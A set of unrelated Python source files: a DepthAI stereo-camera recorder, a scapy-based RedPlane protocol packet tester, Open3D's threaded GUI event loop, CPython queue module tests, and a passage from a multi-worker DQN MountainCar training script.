| source | python |
|---|---|
depthai_record.py
|
#!/usr/bin/env python3
from pathlib import Path
from multiprocessing import Queue
from threading import Thread
import depthai as dai
from enum import Enum
import cv2
class EncodingQuality(Enum):
BEST = 1 # Lossless MJPEG
HIGH = 2 # MJPEG Quality=97 (default)
MEDIUM = 3 # MJPEG Quality=93
LOW = 4 # H265 BitrateKbps=10000
class Record():
def __init__(self, path: Path, device) -> None:
self.save = ['color', 'left', 'right']
self.fps = 30
self.timelapse = -1
self.device = device
self.quality = EncodingQuality.HIGH
self.rotate = -1
self.preview = False
self.stereo = 1 < len(device.getConnectedCameras())
self.mxid = device.getMxId()
self.path = self.create_folder(path, self.mxid)
calibData = device.readCalibration()
calibData.eepromToJsonFile(str(self.path / "calib.json"))
self.convert_mp4 = False
def run(self):
files = {}
def create_video_file(name):
if name == 'depth': # or (name=='color' and 'depth' in self.save):
files[name] = self.depthAiBag
else:
ext = 'h265' if self.quality == EncodingQuality.LOW else 'mjpeg'
files[name] = open(str(self.path / f"{name}.{ext}"), 'wb')
# if name == "color": fourcc = "I420"
# elif name == "depth": fourcc = "Y16 " # 16-bit uncompressed greyscale image
# else : fourcc = "GREY" #Simple, single Y plane for monochrome images.
# files[name] = VideoWriter(str(path / f"{name}.avi"), VideoWriter_fourcc(*fourcc), fps, sizes[name], isColor=name=="color")
while True:
try:
frames = self.frame_q.get()
if frames is None:
break
for name in frames:
if name not in files: # File wasn't created yet
create_video_file(name)
# if self.rotate != -1: # Doesn't work atm
# frames[name] = cv2.rotate(frames[name], self.rotate)
files[name].write(frames[name])
# frames[name].tofile(files[name])
except KeyboardInterrupt:
break
# Close all files - Can't use ExitStack with VideoWriter
for name in files:
files[name].close()
print('Exiting store frame thread')
def start(self):
if not self.stereo: # If device doesn't have stereo camera pair
if "left" in self.save: self.save.remove("left")
if "right" in self.save: self.save.remove("right")
if "disparity" in self.save: self.save.remove("disparity")
if "depth" in self.save: self.save.remove("depth")
if self.preview: self.save.append('preview')
if 0 < self.timelapse:
self.fps = 5
self.pipeline, self.nodes = self.create_pipeline()
if "depth" in self.save:
from libraries.depthai_rosbags import DepthAiBags
res = ['depth']
# If rotate 90 degrees
if self.rotate in [0,2]: res = (res[1], res[0])
self.depthAiBag = DepthAiBags(self.path, self.device, self.get_sizes(), rgb='color' in self.save)
self.frame_q = Queue(20)
self.process = Thread(target=self.run)
self.process.start()
self.device.startPipeline(self.pipeline)
self.queues = []
maxSize = 1 if 0 < self.timelapse else 10
for stream in self.save:
self.queues.append({
'q': self.device.getOutputQueue(name=stream, maxSize=maxSize, blocking=False),
'msgs': [],
'name': stream,
'mxid': self.mxid
})
def set_fps(self, fps):
self.fps = fps
def set_timelapse(self, timelapse):
self.timelapse = timelapse
def set_quality(self, quality: EncodingQuality):
self.quality = quality
def set_preview(self, preview: bool):
self.preview = preview
'''
Available values for `angle`:
- cv2.ROTATE_90_CLOCKWISE (0)
- cv2.ROTATE_180 (1)
- cv2.ROTATE_90_COUNTERCLOCKWISE (2)
'''
def set_rotate(self, angle):
raise Exception("Rotating not yet supported!")
# Currently RealSense Viewer throws error "memory access violation". Debug.
self.rotate = angle
# Which streams to save to the disk (on the host)
def set_save_streams(self, save_streams):
self.save = save_streams
print('save', self.save)
def get_sizes(self):
dict = {}
if "color" in self.save: dict['color'] = self.nodes['color'].getVideoSize()
if "right" in self.save: dict['right'] = self.nodes['right'].getResolutionSize()
if "left" in self.save: dict['left'] = self.nodes['left'].getResolutionSize()
if "disparity" in self.save: dict['disparity'] = self.nodes['left'].getResolutionSize()
if "depth" in self.save: dict['depth'] = self.nodes['left'].getResolutionSize()
return dict
def create_folder(self, path: Path, mxid: str):
i = 0
while True:
i += 1
recordings_path = path / f"{i}-{str(mxid)}"
if not recordings_path.is_dir():
recordings_path.mkdir(parents=True, exist_ok=False)
return recordings_path
def create_pipeline(self):
pipeline = dai.Pipeline()
nodes = {}
def create_mono(name):
nodes[name] = pipeline.createMonoCamera()
nodes[name].setResolution(dai.MonoCameraProperties.SensorResolution.THE_720_P)
socket = dai.CameraBoardSocket.LEFT if name == "left" else dai.CameraBoardSocket.RIGHT
nodes[name].setBoardSocket(socket)
nodes[name].setFps(self.fps)
def stream_out(name, fps, out, noEnc=False):
# Create XLinkOutputs for the stream
xout = pipeline.createXLinkOut()
xout.setStreamName(name)
if noEnc:
out.link(xout.input)
return
encoder = pipeline.createVideoEncoder()
profile = dai.VideoEncoderProperties.Profile.H265_MAIN if self.quality == EncodingQuality.LOW else dai.VideoEncoderProperties.Profile.MJPEG
encoder.setDefaultProfilePreset(fps, profile)
if self.quality == EncodingQuality.BEST:
encoder.setLossless(True)
elif self.quality == EncodingQuality.HIGH:
encoder.setQuality(97)
elif self.quality == EncodingQuality.MEDIUM:
encoder.setQuality(93)
elif self.quality == EncodingQuality.LOW:
encoder.setBitrateKbps(10000)
out.link(encoder.input)
encoder.bitstream.link(xout.input)
if "color" in self.save:
nodes['color'] = pipeline.createColorCamera()
nodes['color'].setBoardSocket(dai.CameraBoardSocket.RGB)
# RealSense Viewer expects RGB color order
nodes['color'].setColorOrder(dai.ColorCameraProperties.ColorOrder.RGB)
nodes['color'].setResolution(dai.ColorCameraProperties.SensorResolution.THE_4_K)
nodes['color'].setIspScale(1,2) # 1080P
nodes['color'].setFps(self.fps)
if self.preview:
nodes['color'].setPreviewSize(640, 360)
stream_out("preview", None, nodes['color'].preview, noEnc=True)
# TODO change out to .isp instead of .video when ImageManip will support I420 -> NV12
# Don't encode color stream if we save depth; as we will be saving color frames in rosbags as well
stream_out("color", nodes['color'].getFps(), nodes['color'].video) #, noEnc='depth' in self.save)
if True in (el in ["left", "disparity", "depth"] for el in self.save):
create_mono("left")
if "left" in self.save:
stream_out("left", nodes['left'].getFps(), nodes['left'].out)
if True in (el in ["right", "disparity", "depth"] for el in self.save):
create_mono("right")
if "right" in self.save:
stream_out("right", nodes['right'].getFps(), nodes['right'].out)
if True in (el in ["disparity", "depth"] for el in self.save):
nodes['stereo'] = pipeline.createStereoDepth()
nodes['stereo'].initialConfig.setConfidenceThreshold(255)
nodes['stereo'].initialConfig.setMedianFilter(dai.StereoDepthProperties.MedianFilter.KERNEL_7x7)
# TODO: configurable
nodes['stereo'].setLeftRightCheck(True)
nodes['stereo'].setExtendedDisparity(False)
if "disparity" not in self.save and "depth" in self.save:
nodes['stereo'].setSubpixel(True) # For better depth visualization
# if "depth" and "color" in self.save: # RGB depth alignment
# nodes['color'].setIspScale(1,3) # 4k -> 720P
# # For now, RGB needs fixed focus to properly align with depth.
# # This value was used during calibration
# nodes['color'].initialControl.setManualFocus(130)
# nodes['stereo'].setDepthAlign(dai.CameraBoardSocket.RGB)
nodes['left'].out.link(nodes['stereo'].left)
nodes['right'].out.link(nodes['stereo'].right)
if "disparity" in self.save:
stream_out("disparity", nodes['right'].getFps(), nodes['stereo'].disparity)
if "depth" in self.save:
stream_out('depth', None, nodes['stereo'].depth, noEnc=True)
self.nodes = nodes
self.pipeline = pipeline
return pipeline, nodes
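# --- Hypothetical usage sketch (not part of the original file) ---
# The calling script is not included here; assuming the API above, a Record
# instance would typically be driven roughly like this:
#
#   with dai.Device() as device:
#       rec = Record(Path("recordings"), device)
#       rec.set_quality(EncodingQuality.HIGH)
#       rec.start()                     # builds the pipeline and the writer thread
#       # ...poll rec.queues, sync frames, and push frame dicts into rec.frame_q...
#       rec.frame_q.put(None)           # None tells the writer thread to exit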
|
pktgen.py
|
#!/usr/bin/python
######################################################
# Copyright (C) Microsoft. All rights reserved. #
######################################################
import os
import sys
import time
import random
import threading
if os.getuid() !=0:
print """
ERROR: This script requires root privileges.
Use 'sudo' to run it.
"""
quit()
from scapy.all import *
flow_vals = {}
NUM_TEST_KEYS = 1000
txn_type_enum = { 0x0: "LEASE_NEW_REQ", 0x1: "LEASE_RENEW_REQ",
0x2: "LEASE_NEW_ACK", 0x3: "LEASE_RENEW_ACK",
0x4: "LEASE_MIGRATE_ACK" }
class RedplaneAck (Packet):
name = "RedPlane ACK header"
fields_desc = [ BitEnumField("ack_type", 0, 8, txn_type_enum),
BitField("seq_num", 0, 32),
BitField("lease_expire_time", 0, 32),
BitField("flow_key", 0, 104)
]
class RedplaneState (Packet):
name = "RedPlane State header"
fields_desc = [ BitField("State", 0, 32)
]
bind_layers(UDP, RedplaneAck, dport=4000)
bind_layers(RedplaneAck, RedplaneState, ack_type=0x4)
bind_layers(RedplaneState, IP)
bind_layers(RedplaneAck, IP, ack_type=0x2)
bind_layers(RedplaneAck, IP, ack_type=0x3)
class RedplaneTxn (Packet):
name = "RedPlane transaction header"
fields_desc = [ BitEnumField("txn_type", 0, 8, txn_type_enum),
BitField("seq_num", 0, 32),
BitField("flow_key", 0, 104),
BitField("flow_value", 0, 32)
]
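# Note: by the field widths above, both RedplaneTxn and RedplaneAck are
# 8 + 32 + 104 + 32 = 176 bits (22 bytes) on the wire; the ACK carries a
# lease_expire_time where the transaction carries a flow_value.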
bind_layers(UDP, RedplaneTxn, sport=4000)
bind_layers(RedplaneTxn, IP)
# Send txn from a switch to a state store
def send_write_txn (src_ip, dst_ip, dest_port, flow_key, flow_val, txn_type, seq_num, payload_size):
p = (Ether()/
IP(dst=dst_ip, src=src_ip)/
UDP(sport=4000, dport=dest_port)/
RedplaneTxn(txn_type=txn_type, seq_num=seq_num, flow_key=flow_key, flow_value=flow_val)/
IP()/
#TCP()/
Raw(RandString(size=payload_size)))
sendp(p, iface="ens1", count = 1)
def send_read_txn (src_ip, dst_ip, dest_port, txn_type, seq_num):
p = (Ether()/
IP(dst=dst_ip, src=src_ip)/
UDP(sport=4000, dport=dest_port)/
RedplaneTxn(txn_type=txn_type, seq_num=seq_num, flow_key=0))
sendp(p, iface="ens1", count = 1)
def print_pkt (pkt):
flow_key = int(pkt[RedplaneAck].flow_key)
assert(flow_vals[flow_key] == int(pkt[RedplaneState].State))
def sniff_thread():
sniff (iface="ens1", filter='udp dst port 4000', prn=print_pkt, count = NUM_TEST_KEYS)
if __name__ == "__main__":
payload_size = int(sys.argv[1])
flow_keys = []
print ("LEASE_NEW_REQ")
# send LEASE_NEW_REQ
for i in range(0, NUM_TEST_KEYS):
while True:
flow_key = random.getrandbits(104)
if flow_key in flow_keys:
continue
flow_keys.append(flow_key)
break
send_write_txn ("198.19.10.0","198.19.11.0", 4001, flow_key, 0, 0x0, 0, payload_size)
print ("LEASE_RENEW_REQ (WRITE)")
# send LEASE_RENEW_REQ (WRITE)
accessed = []
count = 0
while True:
idx = random.randint(0, NUM_TEST_KEYS-1)
if idx in accessed:
continue
flow_val = random.getrandbits(32)
send_write_txn ("198.19.10.0","198.19.11.0", 4001, flow_keys[idx], flow_val, 0x1, 1, payload_size)
accessed.append(idx)
flow_vals[flow_keys[idx]] = flow_val
count = count + 1
if count == NUM_TEST_KEYS:
break
print ("LEASE_NEW_REQ (MIGRATE))")
## send LEASE_NEW_REQ (MIGRATE)
sniff_th = threading.Thread(target=sniff_thread, args=())
sniff_th.start()
time.sleep(1)
for i in range(0, NUM_TEST_KEYS):
send_write_txn ("198.19.10.0","198.19.11.0", 4001, flow_keys[i], 0, 0x0, 0, payload_size)
sniff_th.join()
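# Hypothetical invocation (inferred from the argument parsing above): the script
# must run as root and takes the payload size in bytes as its only argument, e.g.
#   sudo ./pktgen.py 64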
|
async_event_loop.py
|
# ----------------------------------------------------------------------------
# - Open3D: www.open3d.org -
# ----------------------------------------------------------------------------
# The MIT License (MIT)
#
# Copyright (c) 2018-2021 www.open3d.org
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
# ----------------------------------------------------------------------------
"""Run the GUI event loop in a non-main thread. This allows using the
GUI from plugins to other apps (e.g.: Jupyter or Tensorboard) where the GUI
cannot be started in the main thread. Currently does not work in macOS.
.. note:: This is a singleton class implemented with this module as a
holder. The ``async_event_loop`` singleton is started whenever this
module is imported. If you are using remote visualization with WebRTC,
you must call ``enable_webrtc()`` before importing this module.
"""
import threading
from collections import deque
import open3d as o3d
class _AsyncEventLoop:
class _Task:
_g_next_id = 0
def __init__(self, func, *args, **kwargs):
self.task_id = self._g_next_id
self.func = func, args, kwargs
_AsyncEventLoop._Task._g_next_id += 1
def __init__(self):
# TODO (yixing): find a better solution. Currently py::print acquires
# GIL which causes deadlock when AsyncEventLoop is used. By calling
# reset_print_function(), all C++ prints will be directed to the
# terminal while python print will still remain in the cell.
o3d.utility.reset_print_function()
self._lock = threading.Lock()
self._cv = threading.Condition(self._lock)
self._run_queue = deque()
self._return_vals = {}
self._started = False
self._start()
def _start(self):
if not self._started:
self._thread = threading.Thread(name="GUIMain",
target=self._thread_main)
self._thread.start()
self._started = True
def run_sync(self, func, *args, **kwargs):
"""Enqueue task, wait for completion and return result. Can run in any
thread."""
from open3d.visualization.tensorboard_plugin.util import _log
if not self._started:
raise RuntimeError("GUI thread has exited.")
with self._lock:
task = _AsyncEventLoop._Task(func, *args, **kwargs)
_log.debug(f"[async_event_loop] Enqueue {func.__name__} with args:"
f" {args} {kwargs}")
self._run_queue.append(task)
while True:
with self._cv:
self._cv.wait_for(lambda: task.task_id in self._return_vals)
with self._lock:
_log.debug(f"[async_event_loop] Completed {func.__name__}")
return self._return_vals.pop(task.task_id)
def _thread_main(self):
"""Main GUI thread event loop"""
app = o3d.visualization.gui.Application.instance
app.initialize()
done = False
while not done:
while len(self._run_queue) > 0:
with self._lock:
task = self._run_queue.popleft()
func, args, kwargs = task.func
retval = func(*args, **kwargs)
with self._cv:
self._return_vals[task.task_id] = retval
self._cv.notify_all()
done = not app.run_one_tick()
self._started = False # Main GUI thread has exited
# The _AsyncEventLoop class shall only be used to create a singleton instance.
# There are different ways to achieve this, here we use the module as a holder
# for singleton variables, see: https://stackoverflow.com/a/31887/1255535.
async_event_loop = _AsyncEventLoop()
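# Example (hypothetical, not part of the original module): any thread can hand
# work to the GUI thread and wait for its return value:
#   result = async_event_loop.run_sync(lambda: 1 + 1)   # returns 2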
|
test_queue.py
|
# Some simple queue module tests, plus some failure conditions
# to ensure the Queue locks remain stable.
import itertools
import random
import threading
import time
import unittest
import weakref
from test import support
from test.support import import_helper
py_queue = import_helper.import_fresh_module('queue', blocked=['_queue'])
c_queue = import_helper.import_fresh_module('queue', fresh=['_queue'])
need_c_queue = unittest.skipUnless(c_queue, "No _queue module found")
QUEUE_SIZE = 5
def qfull(q):
return q.maxsize > 0 and q.qsize() == q.maxsize
# A thread to run a function that unclogs a blocked Queue.
class _TriggerThread(threading.Thread):
def __init__(self, fn, args):
self.fn = fn
self.args = args
self.startedEvent = threading.Event()
threading.Thread.__init__(self)
def run(self):
# The sleep isn't necessary, but is intended to give the blocking
# function in the main thread a chance at actually blocking before
# we unclog it. But if the sleep is longer than the timeout-based
# tests wait in their blocking functions, those tests will fail.
# So we give them much longer timeout values compared to the
# sleep here (I aimed at 10 seconds for blocking functions --
# they should never actually wait that long - they should make
# progress as soon as we call self.fn()).
time.sleep(0.1)
self.startedEvent.set()
self.fn(*self.args)
# Execute a function that blocks, and in a separate thread, a function that
# triggers the release. Returns the result of the blocking function. Caution:
# block_func must guarantee to block until trigger_func is called, and
# trigger_func must guarantee to change queue state so that block_func can make
# enough progress to return. In particular, a block_func that just raises an
# exception regardless of whether trigger_func is called will lead to
# timing-dependent sporadic failures, and one of those went rarely seen but
# undiagnosed for years. Now block_func must be unexceptional. If block_func
# is supposed to raise an exception, call do_exceptional_blocking_test()
# instead.
class BlockingTestMixin:
def do_blocking_test(self, block_func, block_args, trigger_func, trigger_args):
thread = _TriggerThread(trigger_func, trigger_args)
thread.start()
try:
self.result = block_func(*block_args)
# If block_func returned before our thread made the call, we failed!
if not thread.startedEvent.is_set():
self.fail("blocking function %r appeared not to block" %
block_func)
return self.result
finally:
support.join_thread(thread, 10) # make sure the thread terminates
# Call this instead if block_func is supposed to raise an exception.
def do_exceptional_blocking_test(self,block_func, block_args, trigger_func,
trigger_args, expected_exception_class):
thread = _TriggerThread(trigger_func, trigger_args)
thread.start()
try:
try:
block_func(*block_args)
except expected_exception_class:
raise
else:
self.fail("expected exception of kind %r" %
expected_exception_class)
finally:
support.join_thread(thread, 10) # make sure the thread terminates
if not thread.startedEvent.is_set():
self.fail("trigger thread ended but event never set")
class BaseQueueTestMixin(BlockingTestMixin):
def setUp(self):
self.cum = 0
self.cumlock = threading.Lock()
def basic_queue_test(self, q):
if q.qsize():
raise RuntimeError("Call this function with an empty queue")
self.assertTrue(q.empty())
self.assertFalse(q.full())
# I guess we better check things actually queue correctly a little :)
q.put(111)
q.put(333)
q.put(222)
target_order = dict(Queue = [111, 333, 222],
LifoQueue = [222, 333, 111],
PriorityQueue = [111, 222, 333])
actual_order = [q.get(), q.get(), q.get()]
self.assertEqual(actual_order, target_order[q.__class__.__name__],
"Didn't seem to queue the correct data!")
for i in range(QUEUE_SIZE-1):
q.put(i)
self.assertTrue(q.qsize(), "Queue should not be empty")
self.assertTrue(not qfull(q), "Queue should not be full")
last = 2 * QUEUE_SIZE
full = 3 * 2 * QUEUE_SIZE
q.put(last)
self.assertTrue(qfull(q), "Queue should be full")
self.assertFalse(q.empty())
self.assertTrue(q.full())
try:
q.put(full, block=0)
self.fail("Didn't appear to block with a full queue")
except self.queue.Full:
pass
try:
q.put(full, timeout=0.01)
self.fail("Didn't appear to time-out with a full queue")
except self.queue.Full:
pass
# Test a blocking put
self.do_blocking_test(q.put, (full,), q.get, ())
self.do_blocking_test(q.put, (full, True, 10), q.get, ())
# Empty it
for i in range(QUEUE_SIZE):
q.get()
self.assertTrue(not q.qsize(), "Queue should be empty")
try:
q.get(block=0)
self.fail("Didn't appear to block with an empty queue")
except self.queue.Empty:
pass
try:
q.get(timeout=0.01)
self.fail("Didn't appear to time-out with an empty queue")
except self.queue.Empty:
pass
# Test a blocking get
self.do_blocking_test(q.get, (), q.put, ('empty',))
self.do_blocking_test(q.get, (True, 10), q.put, ('empty',))
def worker(self, q):
while True:
x = q.get()
if x < 0:
q.task_done()
return
with self.cumlock:
self.cum += x
q.task_done()
def queue_join_test(self, q):
self.cum = 0
threads = []
for i in (0,1):
thread = threading.Thread(target=self.worker, args=(q,))
thread.start()
threads.append(thread)
for i in range(100):
q.put(i)
q.join()
self.assertEqual(self.cum, sum(range(100)),
"q.join() did not block until all tasks were done")
for i in (0,1):
q.put(-1) # instruct the threads to close
q.join() # verify that you can join twice
for thread in threads:
thread.join()
def test_queue_task_done(self):
# Test to make sure a queue task completed successfully.
q = self.type2test()
try:
q.task_done()
except ValueError:
pass
else:
self.fail("Did not detect task count going negative")
def test_queue_join(self):
# Test that a queue join()s successfully, and before anything else
# (done twice for insurance).
q = self.type2test()
self.queue_join_test(q)
self.queue_join_test(q)
try:
q.task_done()
except ValueError:
pass
else:
self.fail("Did not detect task count going negative")
def test_basic(self):
# Do it a couple of times on the same queue.
# Done twice to make sure works with same instance reused.
q = self.type2test(QUEUE_SIZE)
self.basic_queue_test(q)
self.basic_queue_test(q)
def test_negative_timeout_raises_exception(self):
q = self.type2test(QUEUE_SIZE)
with self.assertRaises(ValueError):
q.put(1, timeout=-1)
with self.assertRaises(ValueError):
q.get(1, timeout=-1)
def test_nowait(self):
q = self.type2test(QUEUE_SIZE)
for i in range(QUEUE_SIZE):
q.put_nowait(1)
with self.assertRaises(self.queue.Full):
q.put_nowait(1)
for i in range(QUEUE_SIZE):
q.get_nowait()
with self.assertRaises(self.queue.Empty):
q.get_nowait()
def test_shrinking_queue(self):
# issue 10110
q = self.type2test(3)
q.put(1)
q.put(2)
q.put(3)
with self.assertRaises(self.queue.Full):
q.put_nowait(4)
self.assertEqual(q.qsize(), 3)
q.maxsize = 2 # shrink the queue
with self.assertRaises(self.queue.Full):
q.put_nowait(4)
class QueueTest(BaseQueueTestMixin):
def setUp(self):
self.type2test = self.queue.Queue
super().setUp()
class PyQueueTest(QueueTest, unittest.TestCase):
queue = py_queue
@need_c_queue
class CQueueTest(QueueTest, unittest.TestCase):
queue = c_queue
class LifoQueueTest(BaseQueueTestMixin):
def setUp(self):
self.type2test = self.queue.LifoQueue
super().setUp()
class PyLifoQueueTest(LifoQueueTest, unittest.TestCase):
queue = py_queue
@need_c_queue
class CLifoQueueTest(LifoQueueTest, unittest.TestCase):
queue = c_queue
class PriorityQueueTest(BaseQueueTestMixin):
def setUp(self):
self.type2test = self.queue.PriorityQueue
super().setUp()
class PyPriorityQueueTest(PriorityQueueTest, unittest.TestCase):
queue = py_queue
@need_c_queue
class CPriorityQueueTest(PriorityQueueTest, unittest.TestCase):
queue = c_queue
# A Queue subclass that can provoke failure at a moment's notice :)
class FailingQueueException(Exception): pass
class FailingQueueTest(BlockingTestMixin):
def setUp(self):
Queue = self.queue.Queue
class FailingQueue(Queue):
def __init__(self, *args):
self.fail_next_put = False
self.fail_next_get = False
Queue.__init__(self, *args)
def _put(self, item):
if self.fail_next_put:
self.fail_next_put = False
raise FailingQueueException("You Lose")
return Queue._put(self, item)
def _get(self):
if self.fail_next_get:
self.fail_next_get = False
raise FailingQueueException("You Lose")
return Queue._get(self)
self.FailingQueue = FailingQueue
super().setUp()
def failing_queue_test(self, q):
if q.qsize():
raise RuntimeError("Call this function with an empty queue")
for i in range(QUEUE_SIZE-1):
q.put(i)
# Test a failing non-blocking put.
q.fail_next_put = True
try:
q.put("oops", block=0)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
q.fail_next_put = True
try:
q.put("oops", timeout=0.1)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
q.put("last")
self.assertTrue(qfull(q), "Queue should be full")
# Test a failing blocking put
q.fail_next_put = True
try:
self.do_blocking_test(q.put, ("full",), q.get, ())
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
# Check the Queue isn't damaged.
# put failed, but get succeeded - re-add
q.put("last")
# Test a failing timeout put
q.fail_next_put = True
try:
self.do_exceptional_blocking_test(q.put, ("full", True, 10), q.get, (),
FailingQueueException)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
# Check the Queue isn't damaged.
# put failed, but get succeeded - re-add
q.put("last")
self.assertTrue(qfull(q), "Queue should be full")
q.get()
self.assertTrue(not qfull(q), "Queue should not be full")
q.put("last")
self.assertTrue(qfull(q), "Queue should be full")
# Test a blocking put
self.do_blocking_test(q.put, ("full",), q.get, ())
# Empty it
for i in range(QUEUE_SIZE):
q.get()
self.assertTrue(not q.qsize(), "Queue should be empty")
q.put("first")
q.fail_next_get = True
try:
q.get()
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
self.assertTrue(q.qsize(), "Queue should not be empty")
q.fail_next_get = True
try:
q.get(timeout=0.1)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
self.assertTrue(q.qsize(), "Queue should not be empty")
q.get()
self.assertTrue(not q.qsize(), "Queue should be empty")
q.fail_next_get = True
try:
self.do_exceptional_blocking_test(q.get, (), q.put, ('empty',),
FailingQueueException)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
# put succeeded, but get failed.
self.assertTrue(q.qsize(), "Queue should not be empty")
q.get()
self.assertTrue(not q.qsize(), "Queue should be empty")
def test_failing_queue(self):
# Test to make sure a queue is functioning correctly.
# Done twice to the same instance.
q = self.FailingQueue(QUEUE_SIZE)
self.failing_queue_test(q)
self.failing_queue_test(q)
class PyFailingQueueTest(FailingQueueTest, unittest.TestCase):
queue = py_queue
@need_c_queue
class CFailingQueueTest(FailingQueueTest, unittest.TestCase):
queue = c_queue
class BaseSimpleQueueTest:
def setUp(self):
self.q = self.type2test()
def feed(self, q, seq, rnd):
while True:
try:
val = seq.pop()
except IndexError:
return
q.put(val)
if rnd.random() > 0.5:
time.sleep(rnd.random() * 1e-3)
def consume(self, q, results, sentinel):
while True:
val = q.get()
if val == sentinel:
return
results.append(val)
def consume_nonblock(self, q, results, sentinel):
while True:
while True:
try:
val = q.get(block=False)
except self.queue.Empty:
time.sleep(1e-5)
else:
break
if val == sentinel:
return
results.append(val)
def consume_timeout(self, q, results, sentinel):
while True:
while True:
try:
val = q.get(timeout=1e-5)
except self.queue.Empty:
pass
else:
break
if val == sentinel:
return
results.append(val)
def run_threads(self, n_feeders, n_consumers, q, inputs,
feed_func, consume_func):
results = []
sentinel = None
seq = inputs + [sentinel] * n_consumers
seq.reverse()
rnd = random.Random(42)
exceptions = []
def log_exceptions(f):
def wrapper(*args, **kwargs):
try:
f(*args, **kwargs)
except BaseException as e:
exceptions.append(e)
return wrapper
feeders = [threading.Thread(target=log_exceptions(feed_func),
args=(q, seq, rnd))
for i in range(n_feeders)]
consumers = [threading.Thread(target=log_exceptions(consume_func),
args=(q, results, sentinel))
for i in range(n_consumers)]
with support.start_threads(feeders + consumers):
pass
self.assertFalse(exceptions)
self.assertTrue(q.empty())
self.assertEqual(q.qsize(), 0)
return results
def test_basic(self):
# Basic tests for get(), put() etc.
q = self.q
self.assertTrue(q.empty())
self.assertEqual(q.qsize(), 0)
q.put(1)
self.assertFalse(q.empty())
self.assertEqual(q.qsize(), 1)
q.put(2)
q.put_nowait(3)
q.put(4)
self.assertFalse(q.empty())
self.assertEqual(q.qsize(), 4)
self.assertEqual(q.get(), 1)
self.assertEqual(q.qsize(), 3)
self.assertEqual(q.get_nowait(), 2)
self.assertEqual(q.qsize(), 2)
self.assertEqual(q.get(block=False), 3)
self.assertFalse(q.empty())
self.assertEqual(q.qsize(), 1)
self.assertEqual(q.get(timeout=0.1), 4)
self.assertTrue(q.empty())
self.assertEqual(q.qsize(), 0)
with self.assertRaises(self.queue.Empty):
q.get(block=False)
with self.assertRaises(self.queue.Empty):
q.get(timeout=1e-3)
with self.assertRaises(self.queue.Empty):
q.get_nowait()
self.assertTrue(q.empty())
self.assertEqual(q.qsize(), 0)
def test_negative_timeout_raises_exception(self):
q = self.q
q.put(1)
with self.assertRaises(ValueError):
q.get(timeout=-1)
def test_order(self):
# Test a pair of concurrent put() and get()
q = self.q
inputs = list(range(100))
results = self.run_threads(1, 1, q, inputs, self.feed, self.consume)
# One producer, one consumer => results appended in well-defined order
self.assertEqual(results, inputs)
def test_many_threads(self):
# Test multiple concurrent put() and get()
N = 50
q = self.q
inputs = list(range(10000))
results = self.run_threads(N, N, q, inputs, self.feed, self.consume)
# Multiple consumers without synchronization append the
# results in random order
self.assertEqual(sorted(results), inputs)
def test_many_threads_nonblock(self):
# Test multiple concurrent put() and get(block=False)
N = 50
q = self.q
inputs = list(range(10000))
results = self.run_threads(N, N, q, inputs,
self.feed, self.consume_nonblock)
self.assertEqual(sorted(results), inputs)
def test_many_threads_timeout(self):
# Test multiple concurrent put() and get(timeout=...)
N = 50
q = self.q
inputs = list(range(1000))
results = self.run_threads(N, N, q, inputs,
self.feed, self.consume_timeout)
self.assertEqual(sorted(results), inputs)
def test_references(self):
# The queue should lose references to each item as soon as
# it leaves the queue.
class C:
pass
N = 20
q = self.q
for i in range(N):
q.put(C())
for i in range(N):
wr = weakref.ref(q.get())
self.assertIsNone(wr())
class PySimpleQueueTest(BaseSimpleQueueTest, unittest.TestCase):
queue = py_queue
def setUp(self):
self.type2test = self.queue._PySimpleQueue
super().setUp()
@need_c_queue
class CSimpleQueueTest(BaseSimpleQueueTest, unittest.TestCase):
queue = c_queue
def setUp(self):
self.type2test = self.queue.SimpleQueue
super().setUp()
def test_is_default(self):
self.assertIs(self.type2test, self.queue.SimpleQueue)
self.assertIs(self.type2test, self.queue.SimpleQueue)
def test_reentrancy(self):
# bpo-14976: put() may be called reentrantly in an asynchronous
# callback.
q = self.q
gen = itertools.count()
N = 10000
results = []
# This test exploits the fact that __del__ in a reference cycle
# can be called any time the GC may run.
class Circular(object):
def __init__(self):
self.circular = self
def __del__(self):
q.put(next(gen))
while True:
o = Circular()
q.put(next(gen))
del o
results.append(q.get())
if results[-1] >= N:
break
self.assertEqual(results, list(range(N + 1)))
if __name__ == "__main__":
unittest.main()
|
dqn_mountaincar.py
|
import os, sys, json
import numpy as np
import tensorflow as tf
import gym, time
import multiprocessing
import threading
from threading import Lock, Thread
from ql_method import dqn_method
from ql_networks import build_dense_network, build_dense_duel
np.random.seed(1)
tf.set_random_seed(1)
MEMORY_SIZE = 1000
layers=1
hiddens=20
lock = Lock()
tol_itr=0
def worker( pnum, COORD, env, dqn, steps, itr):
global tol_itr
print("Runnint worker-%d"%pnum)
for i in range(itr):
if COORD.should_stop()==True:
break
while (tol_itr// N_WORKERS) !=i:
time.sleep(0.1)
observation = env.reset()
ep_r= 0
for j in range(steps):
if pnum==0 and 10<i:
env.render()
action= dqn.choose_action(observation)
observation_, reward, done, info = env.step(action)
if done:
reward = 2
dqn.store_transition(observation, action, reward, observation_)
ep_r= 0.9*ep_r + 0.1*reward
if pnum==0 and j%500==0:
print('p%d %d, %5d Reward:%f'%(pnum, i, j, ep_r))
